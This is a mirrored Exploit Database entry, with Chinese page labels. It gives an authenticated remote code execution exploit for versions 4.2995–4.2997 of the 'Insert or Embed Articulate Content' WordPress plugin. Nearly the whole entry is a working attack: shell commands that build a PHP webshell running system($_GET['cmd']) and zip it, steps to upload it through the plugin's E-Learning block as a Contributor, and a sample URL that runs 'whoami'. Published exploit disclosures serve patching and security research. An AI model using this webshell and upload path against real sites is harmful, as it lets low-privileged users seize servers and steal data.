WordPress Plugin Insert or Embed Articulate Content into WordPress – Remote Code Execution

• Exploit Database
• 115 阅读

• 作者： xulchibalraa
  日期： 2019-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46981/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  # Exploit Title: Authenticated code execution in <code>insert-or-embed-articulate-content-into-wordpress</code> WordPress plugin # Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive # Date: june 2019 # Exploit Author: xulchibalraa # Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/ # Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip # Version: 4.2995 <= 4.2997 # Tested on: WordPress 5.1.1, PHP 5.6 # CVE : -     ## 1. Create a .zip archive with 2 files: index.html, index.php   echo "<html>hello</html>" > index.html echo "<?php echo system($_GET[&apos;cmd&apos;]); ?>" > index.php zip poc.zip index.html index.php   ## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even <code>Contributors</code> role have access to it) ## 3. Create a new Post -> Select <code>Add block</code> -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;) ## 4. Access the webshell from the URL displayed after upload similar to   http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami